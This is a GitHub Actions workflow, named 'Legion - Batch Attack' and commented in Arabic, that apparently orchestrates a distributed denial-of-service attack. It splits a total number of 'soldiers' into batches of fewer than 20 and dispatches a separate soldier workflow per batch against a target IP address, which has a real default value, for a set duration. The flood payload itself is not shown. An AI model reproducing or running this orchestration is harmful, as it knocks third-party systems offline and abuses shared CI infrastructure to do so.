# اسم الـ Workflow: Legion - Batch Attack Strategy (v6 - Final)
name: Legion - Batch Attack (v6)

on:
  workflow_dispatch:
    inputs:
      target_ip:
        description: 'عنوان IP الهدف'
        required: true
        default: '63.246.154.12'
      duration_per_batch:
        description: 'مدة الهجوم لكل دفعة (بالثواني)'
        required: true
        default: '300'
      total_soldiers:
        description: 'إجمالي عدد الجنود المراد إطلاقه'
        required: true
        default: '150'
      batch_size:
        description: 'حجم الدفعة الواحدة (يجب أن يكون أقل من 20)'
        required: true
        default: '19'

jobs:
  # المهمة الأولى: حساب عدد الدفعات
  calculate_batches:
    runs-on: ubuntu-latest
    outputs:
      batch_matrix: ${{ steps.generate-matrix.outputs.matrix }}
    steps:
      - name: Calculate number of batches
        id: generate-matrix
        run: |
          TOTAL=${{ github.event.inputs.total_soldiers }}
          SIZE=${{ github.event.inputs.batch_size }}
          NUM_BATCHES=$(( (TOTAL + SIZE - 1) / SIZE ))
          echo "إجمالي الجنود: $TOTAL, حجم الدفعة: $SIZE, عدد الدفعات المحسوب: $NUM_BATCHES"
          
          MATRIX="{\"include\":["
          for (( i=0; i<$NUM_BATCHES; i++ )); do
            MATRIX+="{\"batch_number\":$i},"
          done
          MATRIX=$(echo $MATRIX | sed 's/,$//')
          MATRIX+="]}"
          
          echo "المصفوفة الناتجة: $MATRIX"
          echo "matrix=$MATRIX" >> $GITHUB_OUTPUT

  # المهمة الثانية: قائد الفيلق الذي ينسق الدفعات
  legion_commander:
    needs: calculate_batches
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix: ${{ fromJson(needs.calculate_batches.outputs.batch_matrix) }}

    steps:
      # --- هذا هو الإصلاح ---
      # تم نقل العملية الحسابية من 'name' إلى 'run'
      - name: Announce and Dispatch Batch
        run: |
          # إجراء العملية الحسابية هنا باستخدام bash
          BATCH_NUM=$(( ${{ matrix.batch_number }} + 1 ))
          echo "===== بدء الدفعة رقم: $BATCH_NUM ====="
        
      # استخدام action منفصل للإرسال
      - name: Dispatch Soldier Batch
        uses: benc-uk/workflow-dispatch@v1
        with:
          workflow: soldier.yml
          token: ${{ secrets.GITHUB_TOKEN }}
          inputs: >
            {
              "target_ip": "${{ github.event.inputs.target_ip }}",
              "duration": "${{ github.event.inputs.duration_per_batch }}",
              "swarm_size": "${{ github.event.inputs.batch_size }}"
            }
